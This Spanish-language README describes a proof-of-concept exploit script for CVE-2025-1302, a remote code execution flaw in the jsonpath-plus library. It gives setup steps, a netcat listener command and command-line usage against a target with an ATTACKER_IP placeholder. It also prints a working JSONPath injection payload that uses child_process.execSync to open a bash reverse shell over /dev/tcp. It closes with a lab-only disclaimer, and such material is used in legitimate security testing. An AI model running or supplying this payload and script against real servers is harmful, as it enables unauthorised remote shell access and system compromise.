Exploit PoC y demo de servidor vulnerable para CVE-2025-1302 en jsonpath-plus.
Nombre del script PoC: poc.py
Un script de explotación de prueba de concepto para CVE-2025-1302, que apunta a una vulnerabilidad de RCE en la librería jsonpath-plus. Cuando se ejecuta contra un endpoint de servicio vulnerable, el script intenta desencadenar la ejecución remota de código mediante un payload de JSONPath y establecer una reverse shell de vuelta al atacante.
--method o --no-fallback.{ip} y {port}.tqdm para los bucles de delay y payload.--output.Clona este repositorio:
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
Instala las dependencias (requiere Python 3.6+):
pip install -r requirements.txt
Inicia un listener en tu máquina atacante (reemplaza el puerto según sea necesario):
nc -lvnp 9999
Ejecuta el PoC:
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file: Archivo que contiene un payload JSONPath por línea. Usa los marcadores de posición {ip} y {port}.--delay: Segundos de espera antes de enviar los payloads (muestra una cuenta atrás).--method: Fuerza POST, GET o AUTO (predeterminado).--no-fallback: Atajo para omitir cualquier reintento GET (equivalente a --method POST).--output: Ruta para guardar el registro JSON de los intentos.$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
Usa este script solo en entornos de laboratorio controlados y contra sistemas que te pertenezcan o para los que tengas permiso explícito de prueba. El uso indebido puede ser ilegal y poco ético.